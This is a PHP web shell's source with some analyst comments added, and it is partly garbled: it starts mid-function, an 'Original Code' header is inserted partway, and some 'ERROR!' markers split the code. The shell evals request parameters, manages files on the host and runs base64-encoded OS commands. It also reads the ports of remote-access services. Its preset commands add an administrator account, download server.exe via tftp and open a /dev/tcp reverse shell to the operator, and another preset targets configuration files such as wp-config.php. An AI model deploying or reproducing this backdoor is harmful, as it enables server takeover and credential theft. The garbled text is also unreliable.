		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++; 
 
		if(n == 0) alert(str + " ... Not-Find") 
 
	} 
 
	if(IE4){ 
 
		txt = win.document.body.createTextRange(); 
 
		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){ 
 
			txt.moveStart("character", 1); 
 
			txt.moveEnd("textedit") 
 
		} 
 
		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++} 
 
		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")} 
 
	} 
 
	return false 
 
} 
 
function CheckDate(){ 
 
	var re = document.getElementById(\'mtime\').value; 
 
	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;  
 
	var r = re.match(reg); 
 
	var t = document.getElementById(\'charset\').value; 
 
    t = t.toLowerCase(); 
 
	if(r==null){alert(\'!:yyyy-mm-dd hh:mm:ss\');return false;} 
 
	else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value); 
 
	if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));} 
 
'); 
 
// The GBK/GB2312 encoding line is only added to the generated script when
// the first character of PHP_VERSION is 5 or higher.
if (substr(PHP_VERSION,0,1)>=5){html_n('if(t=="gbk" || t=="gb2312"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}');} 
 
html_n(' 
 
	document.getElementById(\'editor\').submit();} 
 
}'); 
 
// Branch "3": presets for a database form named DbForm. Indexes 1-4 go to
// DbForm.string, the rest to DbForm.sql; 0 and 5 are rejected.
}elseif($num == "3"){ 
 
	html_n('function Full(i){ 
 
   if(i==0 || i==5){ 
 
     return false; 
 
   } 
 
  Str = new Array(12);   
 
	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb"; 
 
	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****"; 
 
	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****"; 
 
	Str[4] = "Provider=MSDAORA.1;Password=;User ID=;Data Source=;Persist Security Info=True;"; 
 
	Str[6] = "SELECT * FROM [TableName] WHERE ID<100"; 
 
	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')"; 
 
	Str[8] = "DELETE FROM [TableName] WHERE ID=100"; 
 
	Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100"; 
 
	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))"; 
 
	Str[11] = "DROP TABLE [TableName]"; 
 
	Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)"; 
 
	Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS"; 
 
	if(i<=4){ 
 
	  DbForm.string.value = Str[i]; 
 
  }else{ 
 
  	DbForm.sql.value = Str[i]; 
 
  } 
 
  return true; 
 
  }'); 
 
} 
 
// Branch "4": presets for a form named sform. The values are file names of
// application configuration files; the form itself is not in this excerpt.
elseif($num == "4"){ 
 
	html_n('function Fulll(i){ 
 
   if(i==0){ 
 
     return false; 
 
   } 
 
  Str = new Array(8);   
 
	Str[1] = "config.inc.php"; 
 
	Str[2] = "config.inc.php"; 
 
	Str[3] = "config_base.php"; 
 
	Str[4] = "config.inc.php"; 
 
	Str[5] = "config.php"; 
 
	Str[6] = "wp-config.php"; 
 
	Str[7] = "config.php"; 
 
	Str[8] = "mysql.php"; 
 
	sform.code.value = Str[i]; 
 
  return true; 
 
  }'); 
 
} 
 
html_n('</script>'); 
 
} 
 
 
 
/**
 * Emit the stylesheet and script for the left-hand menu frame and open the
 * menu container.
 *
 * Output, in order: a <style> block for the ".menu" definition lists, a
 * <script> block defining getObject(objectId) and showHide(objname), and an
 * opening <div class="menu"> that this function leaves unclosed.
 *
 * NOTE(review): the "ERROR!" text that splits "getElementById" inside the
 * script string looks like an artefact of the decoder that produced this
 * page rather than part of the original script; confirm against the encoded
 * sample before relying on that line for a signature.
 */
function css_left(){ 
 
	html_n('<style type="text/css"> 
 
	.menu{width:152px;margin-left:auto;margin-right:auto;} 
 
	.menu dl{margin-top:2px;} 
 
	.menu dl dt{top left repeat-x;} 
 
	.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold; 
 
	text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;} 
 
	.menu dl dt a:hover{color:#FFFFCC;} 
 
	.menu dl dd ul{list-style:none;} 
 
	.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px; 
 
	background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF; 
 
	border-style:solid;border-width:1px;} 
 
	.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;} 
 
	</STYLE>'); 
 
	// getObject() looks an element up by id with fallbacks for document.all
	// and document.layers; showHide() toggles its display between "none"
	// and "block".
	html_n('<script language="javascript"> 
 
	function getObject(objectId){ 
 
	 if(document.getElERROR! 
ementById && document.getElementById(objectId)) { 
 
	 return document.getElementById(objectId); 
 
	 } 
 
	 else if (document.all && document.all(objectId)) { 
 
	 return document.all(objectId); 
 
	 } 
 
	 else if (document.layers && document.layers[objectId]) { 
 
	 return document.layers[objectId]; 
 
	 } 
 
	 else { 
 
	 return false; 
 
	 } 
 
	} 
 
	function showHide(objname){ 
 
	  var obj = getObject(objname); 
 
	    if(obj.style.display == "none"){ 
 
			obj.style.display = "block"; 
 
		}else{ 
 
			obj.style.display = "none"; 
 
		} 
 
	} 
 
	</script><div class="menu">'); 
 
} 
 
 
 
/**
 * Emit the shared stylesheet for the main frame and open the page body.
 *
 * Writes a <style> block, then an opening <body> tag and an opening
 * <table width="85%">. Neither the body nor the table is closed here;
 * css_foot() writes the matching "</td></tr></table>".
 *
 * In the script shown on this page the function is called before the
 * "eanver" dispatch and again in the "unzip" handler, so this markup
 * precedes most of the panel's pages.
 */
function css_main(){ 
 
	html_n('<style type="text/css"> 
 
	*{padding:0px;margin:0px;} 
 
	body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff} 
 
	body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif; 
 
	height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;} 
 
	input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF} 
 
    a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000} 
 
	.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;} 
 
	</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)"> 
 
	<table width="85%" border=0 bgcolor="#555555" align="center">'); 
 
} 
 
 
 
/**
 * Close the table cell, row and table that the page layout opened.
 *
 * Writes "</td></tr></table>" through html_n(). The <body> tag opened by
 * css_main() is not closed here.
 */
function css_foot(){ 
 
	html_n('</td></tr></table>'); 
 
} 
 
 
 
function Mysql_shellcode() 
 
{ 
 
	return "0x


Original Code

php /tmp/BNL43pbbLb.php
ob_start();

define('myaddress',$_SERVER['SCRIPT_FILENAME']);

define('postpass',$password);

define('shellname',$shellname);

define('myurl',$myurl);

if(@get_magic_quotes_gpc()){

	foreach($_POST as $k => $v) $_POST[$k] = stripslashes($v);

	foreach($_GET as $k => $v) $_GET[$k] = stripslashes($v);

}

if(isset($_REQUEST[postpass])){

hmlogin(2);

@eval($_REQUEST[postpass]);

exit;}

if($_COOKIE['postpass'] != md5(postpass)){

	if($_POST['postpass']){

		if($_POST['postpass'] == postpass){

			setcookie('postpass',md5($_POST['postpass']));

			hmlogin();

		}else{

			echo '<CENTER></CENTER>';

		}

	}

	islogin($shellname,$myurl);

	exit;

}



if(isset($_GET['down'])) do_down($_GET['down']);

if(isset($_GET['pack'])){

	$dir = do_show($_GET['pack']);

	$zip = new eanver($dir);

	$out = $zip->out;

	do_download($out,$_SERVER['HTTP_HOST'].".tar.gz");

}

if(isset($_GET['unzip'])){

	css_main();

	start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);

	exit;

}



define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');

define('run_win',substr(PHP_OS, 0, 3) == "WIN");

define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));

$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";

$doing = isset($_POST['doing']) ? $_POST['doing'] : "";

$path = isset($_GET['path']) ? $_GET['path'] : root_dir;

$name = isset($_POST['name']) ? $_POST['name'] : "";

$img = isset($_GET['img']) ? $_GET['img'] : "";

$p = isset($_GET['p']) ? $_GET['p'] : "";

$pp = urlencode(dirname($p));

if($img) css_img($img);

if($eanver == "phpinfo") die(phpinfo());

if($eanver == 'logout'){

	setcookie('postpass',null);

	die('<meta http-equiv="refresh" content="0;URL=?">');

}



$class = array(

"" => array("upfiles" => "","phpinfo" => "","info_f" => "","phpcode" => "PHP"),

"" => array("sqlshell" => "SQL","mysql_exec" => "MYSQL","myexp" => "MYSQL","servu" => "Serv-U","cmd" => "","linux" => "","downloader" => "","port" => ""),

"" => array("guama" => "","tihuan" => "","scanfile" => "","scanphp" => ""),

"" => array("getcode" => "")

);

$msg = array("0" => "","1" => "","2" => "","3" => "","4" => "","5" => "","6" => "","7" => "");

css_main();

switch($eanver){

	case "left":

	css_left();

		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\">");

		html_img("title");html_n(" </a></dt><dd id=\"items1\" style=\"display:block;\"><ul>");

    $ROOT_DIR = File_Mode();

    html_n("<li><a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'></a></li>");

	html_n("<li><a href='?eanver=main' target='main'></a></li>");

	for ($i=66;$i<=90;$i++){$drive= chr($i).':';

    if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$drive;

    html_n("<li><a title='$drive' href='?eanver=main&path=$drive' target='main'>($drive)</a></li>");}}

	html_n("</ul></dd></dl>");

	$i = 2;

	foreach($class as $name => $array){

		html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");

		html_img("title");html_n(" $name</a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");

		foreach($array as $url => $value){

			html_n("<li><a href=\"?eanver=$url\" target='main'>$value</a></li>");

		}

		html_n("</ul></dd></dl>");

		$i++;

	}

	html_n("<dl><dt><a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\">");

	html_img("title");html_n(" </a></dt><dd id=\"items$i\" style=\"display:block;\"><ul>");

    html_n("<li><a title='' href='?eanver=logout' target=\"main\"></a></li>");

	html_n("</ul></dd></dl>");

	html_n("</div>");

	break;

	

	case "main":

	css_js("1");

	$dir = @dir($path);

	$REAL_DIR = File_Str(realpath($path));

	if(!empty($_POST['actall'])){echo '<div class="actall">'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'</div>';}

	$NUM_D = $NUM_F = 0;

	if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';

	$ROOT_DIR = File_Mode();

	html_n("<table width=\"100%\" border=0 bgcolor=\"#555555\"><tr><td><form method='GET'>:<input type='hidden' name='eanver' value='main'>");

	html_n("<input type='text' size='80' name='path' value='$path'> <input type='submit' value=''></form>");

	html_n("<br><form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'>");

	html_n("<input type=\"button\" value=\"\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"> <input type=\"button\" value=\"\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\">");

	html_input("file","upfilet","","&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ");

	html_input("submit","uploadt","");

	if(!empty($_POST['newfile'])){

		if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";

        $newfile=base64_decode($_POST['newfile']);

		if(strtolower($_POST['charset'])=='utf-8'){$txt=base64_decode($_POST['txt']);}else{$txt=$_POST['txt'];}

        if (substr(PHP_VERSION,0,1)>=5){if((strtolower($_POST['charset'])=='gb2312') or (strtolower($_POST['charset'])=='gbk')){$txt=iconv("UTF-8","gb2312//IGNORE" ,base64_decode($_POST['txt']));}else{$txt = array_iconv($txt);}}

		echo do_write($newfile,$bin,$txt) ? '<br>'.$newfile.' '.$msg[0] : '<br>'.$newfile.' '.$msg[1];

		@touch($newfile,@strtotime($_POST['time']));

	}

	html_n('</form></td></tr></table><form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"><table width="100%" border=0 bgcolor="#555555"><tr height="25"><td width="45%"><b>');

	html_a('?eanver=main&path='.uppath($path),'<b></b>');

	html_n('</b></td><td align="center" width="10%"><b></b></td><td align="center" width="5%"><b></b></td>');

	html_n('<td align="center" width="8%"><b>('.get_current_user().')|</b></td>');

	html_n('<td align="center" width="10%"><b></b></td><td align="center" width="10%"><b></b></td></tr>');

	while($dirs = @$dir->read()){

		if($dirs == '.' or $dirs == '..') continue;

		$dirpath = str_path("$path/$dirs");

		if(is_dir($dirpath)){

			$perm = substr(base_convert(fileperms($dirpath),10,8),-4);

			$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));

			$dirpath = urlencode($dirpath);

			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$dirs.'">');

			html_img("dir");

			html_a('?eanver=main&path='.$dirpath,$dirs);

			html_n('</td><td align="center">');

			html_n("<a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');return false;\"></a>");

			html_n("<a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');return false;\"></a> ");

			html_a('?pack='.$dirpath,'');

			html_n('</td><td align="center">');

			html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);

            html_n('</td><td align="center">'.GetFileOwner("$path/$dirs").':'.GetFileGroup("$path/$dirs"));

			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');

			html_n('</td></tr>');

			$NUM_D++;

		}

	}

	@$dir->rewind();

	while($files = @$dir->read()){

		if($files == '.' or $files == '..') continue;

		$filepath = str_path("$path/$files");

		if(!is_dir($filepath)){

			$fsize = @filesize($filepath);

			$fsize = File_Size($fsize);

			$perm  = substr(base_convert(fileperms($filepath),10,8),-4);

			$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));

			$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);

			$todir=$ROOT_DIR.'/zipfile';

			$filepath = urlencode($filepath);

			$it=substr($filepath,-3);

			html_n('<tr height="25"><td><input type="checkbox" name="files[]" value="'.$files.'">');

			html_img(css_showimg($files));

			html_a($Fileurls,$files,'target="_blank"');

			html_n('</td><td align="center">');

            if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))

			   html_a('?unzip='.$filepath,'','title="'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');return false;"');

			else

               html_a('?eanver=editr&p='.$filepath,'','title="'.$files.'"');



			html_n("<a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');return false;\"></a>");

			html_n("<a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');return false;\"></a> ");

			html_n("<a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');return false;\"></a>");

			html_n('</td><td align="center">');

			html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);

            html_n('</td><td align="center">'.GetFileOwner("$path/$files").':'.GetFileGroup("$path/$files"));

			html_n('</td><td align="center">'.$filetime.'</td><td align="right">');

			html_a('?down='.$filepath,$fsize,'title="'.$files.'"');

			html_n('</td></tr>');

			$NUM_F++;

		}

	}

	@$dir->close();

	if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);

print<<<END

</table>

<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 

<input type="hidden" id="inver" name="inver" value="undefined"> 

<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 

<input type="button" value="" onclick="SubmitUrl(': ','{$REAL_DIR}','a');return false;"> 

<input type="button" value="" onclick="Delok('','b');return false;"> 

<input type="button" value="" onclick="SubmitUrl(': ','0666','c');return false;"> 

<input type="button" value="" onclick="CheckDate('{$Filetime}','d');return false;"> 

<input type="button" value="" onclick="SubmitUrl(': ','{$_SERVER['SERVER_NAME']}.tar.gz','e');return false;">

({$NUM_D}) / ({$NUM_F})</div> 

</form> 

END;

	break;

	

	case "editr":

print<<<END

<script>

END;

html_base();

print<<<END

	</script>

END;

	css_js("2");

	if(!empty($_POST['uploadt'])){

		echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);

		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');

	}

	if(!empty($_GET['redir'])){

        $name=$_GET['name'];

		$newdir = str_path($p.'/'.$name);

		@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);

		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'">');

	}



	if(!empty($_GET['refile'])){

        $name=$_GET['name'];

		$jspath=urlencode($p.'/'.$name);

		$pp = urlencode($p);

		$p = str_path($p.'/'.$name);

		$FILE_CODE = "";

		$charset= 'GB2312';

        $FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);

		if(@file_exists($p)) echo '""<br>';

	}else{

		$jspath=urlencode($p);

		$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));

        $FILE_CODE=@file_get_contents($p);

	     if (substr(PHP_VERSION,0,1)>=5){

            if(empty($_GET['charset'])){

			   if(TestUtf8($FILE_CODE)>1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}

			  }else{

			   if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}

			  }

		  }

        $FILE_CODE = htmlspecialchars($FILE_CODE);

	}

print<<<END

<div class="actall">: <input name="searchs" type="text" value="{$dim}" style="width:500px;">

<input type="button" value="" onclick="search(searchs.value)"></div>

<form method='POST' id="editor"  action='?eanver=main&path={$pp}'>

<div class="actall">

<input type="text" name="newfile"  id="newfile" value="{$p}" style="width:750px;"><input name="charset" id="charset" value="{$charset}" Type="text" style="width:80px;" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this.value;">

<input type="button" value="" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset.value;" style="width:50px;"> 

END;

html_select(array("GB2312" => "GB2312","UTF-8" => "UTF-8","BIG5" => "BIG5","EUC-KR" => "EUC-KR","EUC-JP" => "EUC-JP","SHIFT-JIS" => "SHIFT-JIS","WINDOWS-874" => "WINDOWS-874","ISO-8859-1" => "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\"");

print<<<END

</div>

<div class="actall"><textarea name="txt" id="txt" style="width:100%;height:380px;">{$FILE_CODE}</textarea></div>

<div class="actall"> <input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150px;"> <input type="checkbox" name="bin" value="wb+" size="" checked>()</div>

<div class="actall"><input type="button" value="" onclick="CheckDate();" style="width:80px;"><input name='reset' type='reset' value=''> 

<input type="button" value="" onclick="window.location='?eanver=main&path={$pp}';" style="width:80px;"></div>

</form>

END;

	break;

	

	case "rename":

	html_n("<tr><td>");

	$newname = urldecode($pp).'/'.urlencode($_GET['newname']);

	@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);

	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');

	break;

	

	case "deltree":

	html_n("<tr><td>");

	do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);

	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');

	break;

	

	case "del":

	html_n("<tr><td>");

	@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);

	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');

	break;

	

	case "copy":

	html_n("<tr><td>");

	$newpath = explode('/',$_GET['newcopy']);

	$pathr[0] = $newpath[0];

	for($i=1;$i < count($newpath);$i++){

		$pathr[] = urlencode($newpath[$i]);

	}

	$newcopy = implode('/',$pathr);

	@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);

	die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');

	break;

	

	// Web-shell file action "perm": changes the mode of the request-controlled path $p.
	// The mode comes from POST field `class` and is matched against a fixed list of six
	// values, three offered for directories and three for files.
	// Defender note: world-writable modes (0777 / 0666) appearing on files under the web root
	// are a useful file-integrity signal for this kind of tooling.
	case "perm":

	html_n("<form method='POST'><tr><td>".$p.' : ');

	// html_select() is defined outside this view; presumably it renders the <select>
	// whose value arrives as $_POST['class'] below — confirm against its definition.
	if(is_dir($p)){

		html_select(array("0777" => "0777","0755" => "0755","0555" => "0555"),$_GET['chmod']);

	}else{

		html_select(array("0666" => "0666","0644" => "0644","0444" => "0444"),$_GET['chmod']);

	}

	html_input("submit","save","");

	back();

	if($_POST['class']){

		// String-to-octal mapping; any value outside this list leaves $change unset.
		switch($_POST['class']){

			case "0777": $change = @chmod($p,0777); break;

			case "0755": $change = @chmod($p,0755); break;

			case "0555": $change = @chmod($p,0555); break;

			case "0666": $change = @chmod($p,0666); break;

			case "0644": $change = @chmod($p,0644); break;

			case "0444": $change = @chmod($p,0444); break;

		}

		$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);

		// die() terminates the request here; the closing markup below is only sent when no mode was posted.
		die('<meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'">');

	}

	html_n("</td></tr></form>");

	break;



    // Web-shell action "info_f": host reconnaissance page. It prints PHP configuration values,
    // which extensions/functions are available, server identity, the script's own path, and — via
    // the Windows COM object WScript.Shell — the listening ports configured in the registry for
    // Terminal Services (RDP), Telnet and pcAnywhere.
    // Triage notes:
    //   - eregi() was removed in PHP 7.0 and the COM class exists only on Windows builds with the
    //     com_dotnet extension, so this case only completes on legacy Windows/PHP 5 hosts.
    //   - Nothing here is HTML-escaped; values such as $_SERVER['HTTP_ACCEPT_LANGUAGE'] are echoed raw.
    //   - Info_Cfg() / Info_Fun() are defined outside this view; presumably they report an ini value
    //     and whether a function exists — confirm against their definitions.
    case "info_f":

	$dis_func = get_cfg_var("disable_functions");

	$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "";

	$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "<a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\">".$_SERVER['SERVER_ADMIN']."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";

	// Empty list is shown as "No"; otherwise spaces and commas become <br> so each disabled function is on its own line.
	if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","<br>",$dis_func);$dis_func = str_replace(",","<br>",$dis_func);}

	$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";

	// Rows of [label, value]. Many labels are empty strings in this listing and the date() format
	// string below contains an "ERROR!" marker plus a line break — both look like artefacts of the
	// decoding/extraction step (presumably non-ASCII text was lost), not part of the original sample.
	$info = array(

		array("",date("YmdERROR!
 h:i:s",time())),

		array("","<a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\">".$_SERVER['SERVER_NAME']."</a>"),

		array("IP",gethostbyname($_SERVER['SERVER_NAME'])),

		array("",PHP_OS),

		array("",$_SERVER['HTTP_ACCEPT_LANGUAGE']),

		array("",$_SERVER['SERVER_SOFTWARE']),

		array("IP",$_SERVER["REMOTE_ADDR"]),

		array("Web",$_SERVER['SERVER_PORT']),

		array("PHP",strtoupper(php_sapi_name())),

		array("PHP",PHP_VERSION),

		array("",Info_Cfg("safemode")),

		array("",$adminmail),

		array("",myaddress),

		array(" URL  allow_url_fopen",Info_Cfg("allow_url_fopen")),

		array("curl_exec",Info_Fun("curl_exec")),

		array(" enable_dl",Info_Cfg("enable_dl")),

		array(" display_errors",Info_Cfg("display_errors")),

		array(" register_globals",Info_Cfg("register_globals")),

		array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),

		array(" memory_limit",Info_Cfg("memory_limit")),

		array("POST post_max_size",Info_Cfg("post_max_size")),

		array(" upload_max_filesize",$upsize),

		array(" max_execution_time",Info_Cfg("max_execution_time").""),

		array(" disable_functions",$dis_func),

		array("phpinfo()",$phpinfo),

		array("diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),

		array(" GD Library",Info_Fun("imageline")),

		array("IMAP",Info_Fun("imap_close")),

		array("MySQL",Info_Fun("mysql_close")),

		array("SyBase",Info_Fun("sybase_close")),

		array("Oracle",Info_Fun("ora_close")),

		array("Oracle 8 ",Info_Fun("OCILogOff")),

		array("PREL PCRE",Info_Fun("preg_match")),

		array("PDF",Info_Fun("pdf_close")),

		array("Postgre SQL",Info_Fun("pg_close")),

		array("SNMP",Info_Fun("snmpget")),

		array("(Zlib)",Info_Fun("gzclose")),

		array("XML",Info_Fun("xml_set_object")),

		array("FTP",Info_Fun("ftp_login")),

		array("ODBC",Info_Fun("odbc_close")),

		array("Session",Info_Fun("session_start")),

		array("Socket",Info_Fun("fsockopen")),

	);

	// Windows-only: instantiating COM from a web request is itself a strong anomaly signal.
	$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");

	echo '<table width="100%" border="0">';

	for($i = 0;$i < count($info);$i++){echo '<tr><td width="40%">'.$info[$i][0].'</td><td>'.$info[$i][1].'</td></tr>'."\n";}

// Registry reads for remote-access service ports. The empty catch swallows any failure,
// in which case the three variables echoed below are simply unset.
try{$registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");

$Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");

$PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");

}catch(Exception $e){}

    echo '<tr><td width="40%">Terminal Service</td><td>'.$registry_proxystring.'</td></tr>'."\n";

	echo '<tr><td width="40%">Telnet</td><td>'.$Telnet.'</td></tr>'."\n";

	echo '<tr><td width="40%">PcAnywhere</td><td>'.$PcAnywhere.'</td></tr>'."\n";

	echo '</table>';

	break;





    // Web-shell action "cmd": runs an operating-system command taken from POST field `cmd`
    // and shows its output in a textarea.
    // Detection notes:
    //   - The browser-side script base64-encodes the command before submitting, so plain keyword
    //     matching on request bodies misses it; decode the `cmd` field before inspecting it.
    //   - The preset list embedded below names a local account "envl" being created and added to
    //     the administrators group; that account name is a host-side indicator for this family.
    //   - Expect the web-server/PHP process to spawn a shell or cmd.exe child process.
    // Exec_Run() is defined outside this view; presumably it tries the available PHP
    // process-execution functions — confirm against its definition.
    case "cmd":

	$res = '';

	$cmd = 'dir';

	// Command output ($res) is not HTML-escaped when placed in the textarea; only the echoed-back command is.
	if(!empty($_POST['cmd'])){$res = Exec_Run(base64_decode($_POST['cmd']));$cmd = htmlspecialchars(base64_decode($_POST['cmd']));}



// First heredoc: client-side preset picker. $_SERVER["REMOTE_ADDR"] (the operator's address as
// seen by the server) is interpolated into two of the presets.
print<<<END

<script language="javascript">

function sFull(i){

	Str = new Array(11);

	Str[0] = "dir";

	Str[1] = "net user envl envl /add";

	Str[2] = "net localgroup administrators envl /add";

	Str[3] = "netstat -ano";

	Str[4] = "ipconfig";

	Str[5] = "copy c:\\1.php d:\\2.php";

	Str[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe";

	Str[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123";

	Str[8] = "tasklist -svc";

	document.getElementById('cmd').value = Str[i];

	return true;

}

END;

// html_base() is defined outside this view; presumably it emits the base64encode() JavaScript
// helper that SubmitUrl() calls below — confirm against its definition.
html_base();

print<<<END

function SubmitUrl(){

			document.getElementById('cmd').value = base64encode(document.getElementById('cmd').value);

			document.getElementById('gform').submit();

}

</script>

<form method="POST" name="gform" id="gform" ><center><div class="actall">BASE64</div><div class="actall">

